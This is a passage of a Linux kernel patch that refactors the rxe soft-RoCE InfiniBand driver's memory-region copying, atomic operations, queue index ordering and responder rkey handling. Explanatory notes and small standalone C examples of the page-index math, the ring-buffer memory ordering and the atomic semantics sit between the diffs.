+-		dest = (dir == RXE_TO_MR_OBJ) ? ((void *)(uintptr_t)iova) : addr;
++	if (length == 0)
++		return 0;
+ 
+-		memcpy(dest, src, length);
++	if (WARN_ON(!mr))
++		return -EINVAL;
+ 
++	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
++		rxe_mr_copy_dma(mr, iova, addr, length, dir);
+ 		return 0;
+ 	}
+ 
+-	WARN_ON_ONCE(!mr->map);
+-
+ 	err = mr_check_range(mr, iova, length);
+-	if (err) {
+-		err = -EFAULT;
+-		goto err1;
+-	}
+-
+-	lookup_iova(mr, iova, &m, &i, &offset);
+-
+-	map = mr->map + m;
+-	buf	= map[0]->buf + i;
+-
+-	while (length > 0) {
+-		u8 *src, *dest;
+-
+-		va	= (u8 *)(uintptr_t)buf->addr + offset;
+-		src = (dir == RXE_TO_MR_OBJ) ? addr : va;
+-		dest = (dir == RXE_TO_MR_OBJ) ? va : addr;
+-
+-		bytes	= buf->size - offset;
+-
+-		if (bytes > length)
+-			bytes = length;
+-
+-		memcpy(dest, src, bytes);
+-
+-		length	-= bytes;
+-		addr	+= bytes;
+-
+-		offset	= 0;
+-		buf++;
+-		i++;
+-
+-		if (i == RXE_BUF_PER_MAP) {
+-			i = 0;
+-			map++;
+-			buf = map[0]->buf;
+-		}
++	if (unlikely(err)) {
++		rxe_dbg_mr(mr, "iova out of range");
++		return err;
+ 	}
+ 
+-	return 0;
+-
+-err1:
+-	return err;
++	return rxe_mr_copy_xarray(mr, iova, addr, length, dir);
+ }
+ 
+ /* copy data in or out of a wqe, i.e. sg list
+@@ -477,7 +400,6 @@ int copy_data(
+ 
+ 		if (bytes > 0) {
+ 			iova = sge->addr + offset;
+-
+ 			err = rxe_mr_copy(mr, iova, addr, bytes, dir);
+ 			if (err)
+ 				goto err2;
+@@ -504,6 +426,165 @@ err1:
+ 	return err;
+ }
+ 
++int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, unsigned int length)
++{
++	unsigned int page_offset;
++	unsigned long index;
++	struct page *page;
++	unsigned int bytes;
++	int err;
++	u8 *va;
++
++	/* mr must be valid even if length is zero */
++	if (WARN_ON(!mr))
++		return -EINVAL;
++
++	if (length == 0)
++		return 0;
++
++	if (mr->ibmr.type == IB_MR_TYPE_DMA)
++		return -EFAULT;
++
++	err = mr_check_range(mr, iova, length);
++	if (err)
++		return err;
++
++	while (length > 0) {
++		index = rxe_mr_iova_to_index(mr, iova);
++		page = xa_load(&mr->page_list, index);
++		page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++		if (!page)
++			return -EFAULT;
++		bytes = min_t(unsigned int, length,
++				mr_page_size(mr) - page_offset);
++
++		va = kmap_local_page(page);
++		arch_wb_cache_pmem(va + page_offset, bytes);
++		kunmap_local(va);
++
++		length -= bytes;
++		iova += bytes;
++		page_offset = 0;
++	}
++
++	return 0;
++}
++
++/* Guarantee atomicity of atomic operations at the machine level. */
++static DEFINE_SPINLOCK(atomic_ops_lock);
++
++int rxe_mr_do_atomic_op(struct rxe_mr *mr, u64 iova, int opcode,
++			u64 compare, u64 swap_add, u64 *orig_val)
++{
++	unsigned int page_offset;
++	struct page *page;
++	u64 value;
++	u64 *va;
++
++	if (unlikely(mr->state != RXE_MR_STATE_VALID)) {
++		rxe_dbg_mr(mr, "mr not in valid state");
++		return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
++		page_offset = iova & (PAGE_SIZE - 1);
++		page = virt_to_page(iova & PAGE_MASK);
++	} else {
++		unsigned long index;
++		int err;
++
++		err = mr_check_range(mr, iova, sizeof(value));
++		if (err) {
++			rxe_dbg_mr(mr, "iova out of range");
++			return RESPST_ERR_RKEY_VIOLATION;
++		}
++		page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++		index = rxe_mr_iova_to_index(mr, iova);
++		page = xa_load(&mr->page_list, index);
++		if (!page)
++			return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	if (unlikely(page_offset & 0x7)) {
++		rxe_dbg_mr(mr, "iova not aligned");
++		return RESPST_ERR_MISALIGNED_ATOMIC;
++	}
++
++	va = kmap_local_page(page);
++
++	spin_lock_bh(&atomic_ops_lock);
++	value = *orig_val = va[page_offset >> 3];
++
++	if (opcode == IB_OPCODE_RC_COMPARE_SWAP) {
++		if (value == compare)
++			va[page_offset >> 3] = swap_add;
++	} else {
++		value += swap_add;
++		va[page_offset >> 3] = value;
++	}
++	spin_unlock_bh(&atomic_ops_lock);
++
++	kunmap_local(va);
++
++	return 0;
++}
++
++#if defined CONFIG_64BIT
++/* only implemented or called for 64-bit architectures */
++int rxe_mr_do_atomic_write(struct rxe_mr *mr, u64 iova, u64 value)
++{
++	unsigned int page_offset;
++	struct page *page;
++	u64 *va;
++
++	/* See IBA oA19-28 */
++	if (unlikely(mr->state != RXE_MR_STATE_VALID)) {
++		rxe_dbg_mr(mr, "mr not in valid state");
++		return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
++		page_offset = iova & (PAGE_SIZE - 1);
++		page = virt_to_page(iova & PAGE_MASK);
++	} else {
++		unsigned long index;
++		int err;
++
++		/* See IBA oA19-28 */
++		err = mr_check_range(mr, iova, sizeof(value));
++		if (unlikely(err)) {
++			rxe_dbg_mr(mr, "iova out of range");
++			return RESPST_ERR_RKEY_VIOLATION;
++		}
++		page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++		index = rxe_mr_iova_to_index(mr, iova);
++		page = xa_load(&mr->page_list, index);
++		if (!page)
++			return RESPST_ERR_RKEY_VIOLATION;
++	}
++
++	/* See IBA A19.4.2 */
++	if (unlikely(page_offset & 0x7)) {
++		rxe_dbg_mr(mr, "misaligned address");
++		return RESPST_ERR_MISALIGNED_ATOMIC;
++	}
++
++	va = kmap_local_page(page);
++
++	/* Do atomic write after all prior operations have completed */
++	smp_store_release(&va[page_offset >> 3], value);
++
++	kunmap_local(va);
++
++	return 0;
++}
++#else
++int rxe_mr_do_atomic_write(struct rxe_mr *mr, u64 iova, u64 value)
++{
++	return RESPST_ERR_UNSUPPORTED_OPCODE;
++}
++#endif
++
+ int advance_dma_data(struct rxe_dma_info *dma, unsigned int length)
+ {
+ 	struct rxe_sge		*sge	= &dma->sge[dma->cur_sge];
+@@ -537,12 +618,6 @@ int advance_dma_data(struct rxe_dma_info *dma, unsigned int length)
+ 	return 0;
+ }
+ 
+-/* (1) find the mr corresponding to lkey/rkey
+- *     depending on lookup_type
+- * (2) verify that the (qp) pd matches the mr pd
+- * (3) verify that the mr can support the requested access
+- * (4) verify that mr state is valid
+- */
+ struct rxe_mr *lookup_mr(struct rxe_pd *pd, int access, u32 key,
+ 			 enum rxe_mr_lookup_type type)
+ {
+@@ -663,15 +738,10 @@ int rxe_dereg_mr(struct ib_mr *ibmr, struct ib_udata *udata)
+ void rxe_mr_cleanup(struct rxe_pool_elem *elem)
+ {
+ 	struct rxe_mr *mr = container_of(elem, typeof(*mr), elem);
+-	int i;
+ 
+ 	rxe_put(mr_pd(mr));
+ 	ib_umem_release(mr->umem);
+ 
+-	if (mr->map) {
+-		for (i = 0; i < mr->num_map; i++)
+-			kfree(mr->map[i]);
+-
+-		kfree(mr->map);
+-	}
++	if (mr->ibmr.type != IB_MR_TYPE_DMA)
++		xa_destroy(&mr->page_list);
+ }
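
The hunks above replace rxe's two-level map[]/buf[] page table with a flat xarray indexed by page number: rxe_mr_alloc() preallocates num_buf slots with the xas_nomem() retry loop, rxe_set_page() fills them, and the copy/flush/atomic paths look pages up by index. The rxe_mr_iova_to_index() and rxe_mr_iova_to_page_offset() helpers are not part of this hunk; assuming they do the obvious shift-and-mask arithmetic against the registration's starting iova, the math can be checked with a small standalone C program (all names here are illustrative, not the driver's):

/* gcc -o iova_demo iova_demo.c && ./iova_demo */
#include <stdint.h>
#include <stdio.h>

struct demo_mr {
	uint64_t iova;          /* start of the registered range */
	unsigned int page_size; /* power of two, e.g. 4096 */
};

/* page index relative to the first page of the registration */
static unsigned long iova_to_index(const struct demo_mr *mr, uint64_t iova)
{
	unsigned int shift = __builtin_ctz(mr->page_size); /* gcc/clang builtin */

	return (iova >> shift) - (mr->iova >> shift);
}

/* byte offset within that page */
static unsigned int iova_to_page_offset(const struct demo_mr *mr, uint64_t iova)
{
	return iova & (mr->page_size - 1);
}

int main(void)
{
	struct demo_mr mr = { .iova = 0x10000f00, .page_size = 4096 };
	uint64_t iova = 0x10001010;

	printf("index=%lu offset=%u\n",
	       iova_to_index(&mr, iova),
	       iova_to_page_offset(&mr, iova));
	/* prints index=1 offset=16: second page, 16 bytes in */
	return 0;
}

With a power-of-two page size both lookups reduce to a shift and a mask, which is why rxe_map_mr_sg() above precomputes page_shift and page_mask once per registration.
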
+diff --git a/drivers/infiniband/sw/rxe/rxe_queue.h b/drivers/infiniband/sw/rxe/rxe_queue.h
+index ed44042782fa7..c711cb98b9496 100644
+--- a/drivers/infiniband/sw/rxe/rxe_queue.h
++++ b/drivers/infiniband/sw/rxe/rxe_queue.h
+@@ -35,19 +35,26 @@
+ /**
+  * enum queue_type - type of queue
+  * @QUEUE_TYPE_TO_CLIENT:	Queue is written by rxe driver and
+- *				read by client. Used by rxe driver only.
++ *				read by client which may be a user space
++ *				application or a kernel ulp.
++ *				Used by rxe internals only.
+  * @QUEUE_TYPE_FROM_CLIENT:	Queue is written by client and
+- *				read by rxe driver. Used by rxe driver only.
+- * @QUEUE_TYPE_TO_DRIVER:	Queue is written by client and
+- *				read by rxe driver. Used by kernel client only.
+- * @QUEUE_TYPE_FROM_DRIVER:	Queue is written by rxe driver and
+- *				read by client. Used by kernel client only.
++ *				read by rxe driver.
++ *				Used by rxe internals only.
++ * @QUEUE_TYPE_FROM_ULP:	Queue is written by kernel ulp and
++ *				read by rxe driver.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
++ * @QUEUE_TYPE_TO_ULP:		Queue is written by rxe driver and
++ *				read by kernel ulp.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
+  */
+ enum queue_type {
+ 	QUEUE_TYPE_TO_CLIENT,
+ 	QUEUE_TYPE_FROM_CLIENT,
+-	QUEUE_TYPE_TO_DRIVER,
+-	QUEUE_TYPE_FROM_DRIVER,
++	QUEUE_TYPE_FROM_ULP,
++	QUEUE_TYPE_TO_ULP,
+ };
+ 
+ struct rxe_queue_buf;
+@@ -62,9 +69,9 @@ struct rxe_queue {
+ 	u32			index_mask;
+ 	enum queue_type		type;
+ 	/* private copy of index for shared queues between
+-	 * kernel space and user space. Kernel reads and writes
++	 * driver and clients. Driver reads and writes
+ 	 * this copy and then replicates to rxe_queue_buf
+-	 * for read access by user space.
++	 * for read access by clients.
+ 	 */
+ 	u32			index;
+ };
+@@ -97,19 +104,21 @@ static inline u32 queue_get_producer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		prod = smp_load_acquire(&q->buf->producer_index);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		/* protect driver index */
+-		prod = smp_load_acquire(&q->buf->producer_index);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		prod = smp_load_acquire(&q->buf->producer_index);
++		break;
+ 	}
+ 
+ 	return prod;
+@@ -122,19 +131,21 @@ static inline u32 queue_get_consumer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
++		/* used by rxe which owns the index */
+ 		cons = q->index;
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		cons = q->buf->consumer_index;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		/* protect driver index */
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
++		cons = q->buf->consumer_index;
++		break;
+ 	}
+ 
+ 	return cons;
+@@ -172,24 +183,31 @@ static inline void queue_advance_producer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		prod = (prod + 1) & q->index_mask;
+ 		q->index = prod;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->producer_index, prod);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		prod = (prod + 1) & q->index_mask;
+-		q->buf->producer_index = prod;
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->producer_index, prod);
++		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+ 	}
+ }
+@@ -201,24 +219,30 @@ static inline void queue_advance_consumer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		cons = q->index;
+-		cons = (cons + 1) & q->index_mask;
++		/* used by rxe which owns the index */
++		cons = (q->index + 1) & q->index_mask;
+ 		q->index = cons;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
++		break;
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
+ 		cons = q->buf->consumer_index;
+ 		cons = (cons + 1) & q->index_mask;
+-		q->buf->consumer_index = cons;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	}
+ }
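
The FROM_ULP/TO_ULP renaming above also tightens the memory-ordering story: for each queue exactly one side owns each index, the owner advances it with smp_store_release(), and the other side reads it with smp_load_acquire(). That is the standard single-producer/single-consumer ring discipline. A minimal userspace C11 sketch of the same pairing (illustrative only, not the rxe queue code):

#include <stdatomic.h>
#include <stdbool.h>

#define RING_SIZE 64	/* power of two */

struct ring {
	_Atomic unsigned int prod;	/* written only by the producer */
	_Atomic unsigned int cons;	/* written only by the consumer */
	int slot[RING_SIZE];
};

/* producer: fill the slot first, then publish the index with release */
static bool ring_push(struct ring *r, int v)
{
	unsigned int p = atomic_load_explicit(&r->prod, memory_order_relaxed);
	unsigned int c = atomic_load_explicit(&r->cons, memory_order_acquire);

	if (((p + 1) & (RING_SIZE - 1)) == c)
		return false;				/* full */
	r->slot[p] = v;
	atomic_store_explicit(&r->prod, (p + 1) & (RING_SIZE - 1),
			      memory_order_release);
	return true;
}

/* consumer: observe the index with acquire, then the slot is safe to read */
static bool ring_pop(struct ring *r, int *v)
{
	unsigned int c = atomic_load_explicit(&r->cons, memory_order_relaxed);
	unsigned int p = atomic_load_explicit(&r->prod, memory_order_acquire);

	if (c == p)
		return false;				/* empty */
	*v = r->slot[c];
	atomic_store_explicit(&r->cons, (c + 1) & (RING_SIZE - 1),
			      memory_order_release);
	return true;
}

The release store guarantees that slot contents written before the index update are visible to whoever acquires that index, which is exactly what the "release so client can read it safely" comments above promise.
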
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index c74972244f08f..0cc1ba91d48cc 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -10,43 +10,6 @@
+ #include "rxe_loc.h"
+ #include "rxe_queue.h"
+ 
+-enum resp_states {
+-	RESPST_NONE,
+-	RESPST_GET_REQ,
+-	RESPST_CHK_PSN,
+-	RESPST_CHK_OP_SEQ,
+-	RESPST_CHK_OP_VALID,
+-	RESPST_CHK_RESOURCE,
+-	RESPST_CHK_LENGTH,
+-	RESPST_CHK_RKEY,
+-	RESPST_EXECUTE,
+-	RESPST_READ_REPLY,
+-	RESPST_ATOMIC_REPLY,
+-	RESPST_ATOMIC_WRITE_REPLY,
+-	RESPST_PROCESS_FLUSH,
+-	RESPST_COMPLETE,
+-	RESPST_ACKNOWLEDGE,
+-	RESPST_CLEANUP,
+-	RESPST_DUPLICATE_REQUEST,
+-	RESPST_ERR_MALFORMED_WQE,
+-	RESPST_ERR_UNSUPPORTED_OPCODE,
+-	RESPST_ERR_MISALIGNED_ATOMIC,
+-	RESPST_ERR_PSN_OUT_OF_SEQ,
+-	RESPST_ERR_MISSING_OPCODE_FIRST,
+-	RESPST_ERR_MISSING_OPCODE_LAST_C,
+-	RESPST_ERR_MISSING_OPCODE_LAST_D1E,
+-	RESPST_ERR_TOO_MANY_RDMA_ATM_REQ,
+-	RESPST_ERR_RNR,
+-	RESPST_ERR_RKEY_VIOLATION,
+-	RESPST_ERR_INVALIDATE_RKEY,
+-	RESPST_ERR_LENGTH,
+-	RESPST_ERR_CQ_OVERFLOW,
+-	RESPST_ERROR,
+-	RESPST_RESET,
+-	RESPST_DONE,
+-	RESPST_EXIT,
+-};
+-
+ static char *resp_state_name[] = {
+ 	[RESPST_NONE]				= "NONE",
+ 	[RESPST_GET_REQ]			= "GET_REQ",
+@@ -457,13 +420,23 @@ static enum resp_states rxe_resp_check_length(struct rxe_qp *qp,
+ 	return RESPST_CHK_RKEY;
+ }
+ 
++/* if the reth length field is zero we can assume nothing
++ * about the rkey value and should not validate or use it.
++ * Instead set qp->resp.rkey to 0 which is an invalid rkey
++ * value since the minimum index part is 1.
++ */
+ static void qp_resp_from_reth(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+ {
++	unsigned int length = reth_len(pkt);
++
+ 	qp->resp.va = reth_va(pkt);
+ 	qp->resp.offset = 0;
+-	qp->resp.rkey = reth_rkey(pkt);
+-	qp->resp.resid = reth_len(pkt);
+-	qp->resp.length = reth_len(pkt);
++	qp->resp.resid = length;
++	qp->resp.length = length;
++	if (pkt->mask & RXE_READ_OR_WRITE_MASK && length == 0)
++		qp->resp.rkey = 0;
++	else
++		qp->resp.rkey = reth_rkey(pkt);
+ }
+ 
+ static void qp_resp_from_atmeth(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+@@ -474,6 +447,10 @@ static void qp_resp_from_atmeth(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+ 	qp->resp.resid = sizeof(u64);
+ }
+ 
++/* resolve the packet rkey to qp->resp.mr or set qp->resp.mr to NULL
++ * if an invalid rkey is received or the rdma length is zero. For middle
++ * or last packets use the stored value of mr.
++ */
+ static enum resp_states check_rkey(struct rxe_qp *qp,
+ 				   struct rxe_pkt_info *pkt)
+ {
+@@ -510,10 +487,12 @@ static enum resp_states check_rkey(struct rxe_qp *qp,
+ 		return RESPST_EXECUTE;
+ 	}
+ 
+-	/* A zero-byte op is not required to set an addr or rkey. See C9-88 */
++	/* A zero-byte read or write op is not required to
++	 * set an addr or rkey. See C9-88
++	 */
+ 	if ((pkt->mask & RXE_READ_OR_WRITE_MASK) &&
+-	    (pkt->mask & RXE_RETH_MASK) &&
+-	    reth_len(pkt) == 0) {
++	    (pkt->mask & RXE_RETH_MASK) && reth_len(pkt) == 0) {
++		qp->resp.mr = NULL;
+ 		return RESPST_EXECUTE;
+ 	}
+ 
+@@ -592,6 +571,7 @@ skip_check_range:
+ 	return RESPST_EXECUTE;
+ 
+ err:
++	qp->resp.mr = NULL;
+ 	if (mr)
+ 		rxe_put(mr);
+ 	if (mw)
+@@ -725,17 +705,12 @@ static enum resp_states process_flush(struct rxe_qp *qp,
+ 	return RESPST_ACKNOWLEDGE;
+ }
+ 
+-/* Guarantee atomicity of atomic operations at the machine level. */
+-static DEFINE_SPINLOCK(atomic_ops_lock);
+-
+ static enum resp_states atomic_reply(struct rxe_qp *qp,
+-					 struct rxe_pkt_info *pkt)
++				     struct rxe_pkt_info *pkt)
+ {
+-	u64 *vaddr;
+-	enum resp_states ret;
+ 	struct rxe_mr *mr = qp->resp.mr;
+ 	struct resp_res *res = qp->resp.res;
+-	u64 value;
++	int err;
+ 
+ 	if (!res) {
+ 		res = rxe_prepare_res(qp, pkt, RXE_ATOMIC_MASK);
+@@ -743,32 +718,14 @@ static enum resp_states atomic_reply(struct rxe_qp *qp,
+ 	}
+ 
+ 	if (!res->replay) {
+-		if (mr->state != RXE_MR_STATE_VALID) {
+-			ret = RESPST_ERR_RKEY_VIOLATION;
+-			goto out;
+-		}
+-
+-		vaddr = iova_to_vaddr(mr, qp->resp.va + qp->resp.offset,
+-					sizeof(u64));
+-
+-		/* check vaddr is 8 bytes aligned. */
+-		if (!vaddr || (uintptr_t)vaddr & 7) {
+-			ret = RESPST_ERR_MISALIGNED_ATOMIC;
+-			goto out;
+-		}
++		u64 iova = qp->resp.va + qp->resp.offset;
+ 
+-		spin_lock_bh(&atomic_ops_lock);
+-		res->atomic.orig_val = value = *vaddr;
+-
+-		if (pkt->opcode == IB_OPCODE_RC_COMPARE_SWAP) {
+-			if (value == atmeth_comp(pkt))
+-				value = atmeth_swap_add(pkt);
+-		} else {
+-			value += atmeth_swap_add(pkt);
+-		}
+-
+-		*vaddr = value;
+-		spin_unlock_bh(&atomic_ops_lock);
++		err = rxe_mr_do_atomic_op(mr, iova, pkt->opcode,
++					  atmeth_comp(pkt),
++					  atmeth_swap_add(pkt),
++					  &res->atomic.orig_val);
++		if (err)
++			return err;
+ 
+ 		qp->resp.msn++;
+ 
+@@ -780,35 +737,35 @@ static enum resp_states atomic_reply(struct rxe_qp *qp,
+ 		qp->resp.status = IB_WC_SUCCESS;
+ 	}
+ 
+-	ret = RESPST_ACKNOWLEDGE;
+-out:
+-	return ret;
++	return RESPST_ACKNOWLEDGE;
+ }
+ 
+-#ifdef CONFIG_64BIT
+-static enum resp_states do_atomic_write(struct rxe_qp *qp,
+-					struct rxe_pkt_info *pkt)
++static enum resp_states atomic_write_reply(struct rxe_qp *qp,
++					   struct rxe_pkt_info *pkt)
+ {
+-	struct rxe_mr *mr = qp->resp.mr;
+-	int payload = payload_size(pkt);
+-	u64 src, *dst;
+-
+-	if (mr->state != RXE_MR_STATE_VALID)
+-		return RESPST_ERR_RKEY_VIOLATION;
++	struct resp_res *res = qp->resp.res;
++	struct rxe_mr *mr;
++	u64 value;
++	u64 iova;
++	int err;
+ 
+-	memcpy(&src, payload_addr(pkt), payload);
++	if (!res) {
++		res = rxe_prepare_res(qp, pkt, RXE_ATOMIC_WRITE_MASK);
++		qp->resp.res = res;
++	}
+ 
+-	dst = iova_to_vaddr(mr, qp->resp.va + qp->resp.offset, payload);
+-	/* check vaddr is 8 bytes aligned. */
+-	if (!dst || (uintptr_t)dst & 7)
+-		return RESPST_ERR_MISALIGNED_ATOMIC;
++	if (res->replay)
++		return RESPST_ACKNOWLEDGE;
+ 
+-	/* Do atomic write after all prior operations have completed */
+-	smp_store_release(dst, src);
++	mr = qp->resp.mr;
++	value = *(u64 *)payload_addr(pkt);
++	iova = qp->resp.va + qp->resp.offset;
+ 
+-	/* decrease resp.resid to zero */
+-	qp->resp.resid -= sizeof(payload);
++	err = rxe_mr_do_atomic_write(mr, iova, value);
++	if (err)
++		return err;
+ 
++	qp->resp.resid = 0;
+ 	qp->resp.msn++;
+ 
+ 	/* next expected psn, read handles this separately */
+@@ -817,29 +774,8 @@ static enum resp_states do_atomic_write(struct rxe_qp *qp,
+ 
+ 	qp->resp.opcode = pkt->opcode;
+ 	qp->resp.status = IB_WC_SUCCESS;
+-	return RESPST_ACKNOWLEDGE;
+-}
+-#else
+-static enum resp_states do_atomic_write(struct rxe_qp *qp,
+-					struct rxe_pkt_info *pkt)
+-{
+-	return RESPST_ERR_UNSUPPORTED_OPCODE;
+-}
+-#endif /* CONFIG_64BIT */
+ 
+-static enum resp_states atomic_write_reply(struct rxe_qp *qp,
+-					   struct rxe_pkt_info *pkt)
+-{
+-	struct resp_res *res = qp->resp.res;
+-
+-	if (!res) {
+-		res = rxe_prepare_res(qp, pkt, RXE_ATOMIC_WRITE_MASK);
+-		qp->resp.res = res;
+-	}
+-
+-	if (res->replay)
+-		return RESPST_ACKNOWLEDGE;
+-	return do_atomic_write(qp, pkt);
++	return RESPST_ACKNOWLEDGE;
+ }
+ 
+ static struct sk_buff *prepare_ack_packet(struct rxe_qp *qp,
+@@ -966,7 +902,11 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 	}
+ 
+ 	if (res->state == rdatm_res_state_new) {
+-		if (!res->replay) {
++		if (!res->replay || qp->resp.length == 0) {
++			/* if length == 0, mr will be NULL, which is ok;
++			 * otherwise qp->resp.mr holds a ref that we
++			 * transfer to the local mr and drop below.
++			 */
+ 			mr = qp->resp.mr;
+ 			qp->resp.mr = NULL;
+ 		} else {
+@@ -980,6 +920,10 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 		else
+ 			opcode = IB_OPCODE_RC_RDMA_READ_RESPONSE_FIRST;
+ 	} else {
++		/* re-lookup mr from rkey on all later packets.
++		 * length will be non-zero. This can fail if someone
++		 * has modified or destroyed the mr since the first packet.
++		 */
+ 		mr = rxe_recheck_mr(qp, res->read.rkey);
+ 		if (!mr)
+ 			return RESPST_ERR_RKEY_VIOLATION;
+@@ -997,18 +941,16 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 	skb = prepare_ack_packet(qp, &ack_pkt, opcode, payload,
+ 				 res->cur_psn, AETH_ACK_UNLIMITED);
+ 	if (!skb) {
+-		if (mr)
+-			rxe_put(mr);
+-		return RESPST_ERR_RNR;
++		state = RESPST_ERR_RNR;
++		goto err_out;
+ 	}
+ 
+ 	err = rxe_mr_copy(mr, res->read.va, payload_addr(&ack_pkt),
+ 			  payload, RXE_FROM_MR_OBJ);
+-	if (mr)
+-		rxe_put(mr);
+ 	if (err) {
+ 		kfree_skb(skb);
+-		return RESPST_ERR_RKEY_VIOLATION;
++		state = RESPST_ERR_RKEY_VIOLATION;
++		goto err_out;
+ 	}
+ 
+ 	if (bth_pad(&ack_pkt)) {
+@@ -1017,9 +959,12 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 		memset(pad, 0, bth_pad(&ack_pkt));
+ 	}
+ 
++	/* rxe_xmit_packet always consumes the skb */
+ 	err = rxe_xmit_packet(qp, &ack_pkt, skb);
+-	if (err)
+-		return RESPST_ERR_RNR;
++	if (err) {
++		state = RESPST_ERR_RNR;
++		goto err_out;
++	}
+ 
+ 	res->read.va += payload;
+ 	res->read.resid -= payload;
+@@ -1036,6 +981,9 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 		state = RESPST_CLEANUP;
+ 	}
+ 
++err_out:
++	if (mr)
++		rxe_put(mr);
+ 	return state;
+ }
+ 
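
For reference, the semantics that atomic_reply() now delegates to rxe_mr_do_atomic_op() are easy to state: both IB atomics reply with the original 64-bit value, compare-and-swap stores swap_add only when the current value equals compare, and fetch-and-add unconditionally adds. A standalone sketch of just that arithmetic (the serialization via atomic_ops_lock and the kmap of the target page, shown in rxe_mr.c above, are deliberately elided):

#include <stdint.h>
#include <stdio.h>

/* returns the original value, as the responder must */
static uint64_t do_atomic(uint64_t *slot, int is_cmp_swp,
			  uint64_t compare, uint64_t swap_add)
{
	uint64_t orig = *slot;

	if (is_cmp_swp) {
		if (orig == compare)
			*slot = swap_add;	/* swap only on a match */
	} else {
		*slot = orig + swap_add;	/* fetch-and-add */
	}
	return orig;
}

int main(void)
{
	uint64_t mem = 5;

	printf("fetch_add(3): old=%llu new=%llu\n",
	       (unsigned long long)do_atomic(&mem, 0, 0, 3),
	       (unsigned long long)mem);	/* old=5 new=8 */
	printf("cmp_swp(8,42): old=%llu new=%llu\n",
	       (unsigned long long)do_atomic(&mem, 1, 8, 42),
	       (unsigned long long)mem);	/* old=8 new=42 */
	return 0;
}
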
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index 025b35bf014e2..a3aee247aa157 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -245,7 +245,7 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	int num_sge = ibwr->num_sge;
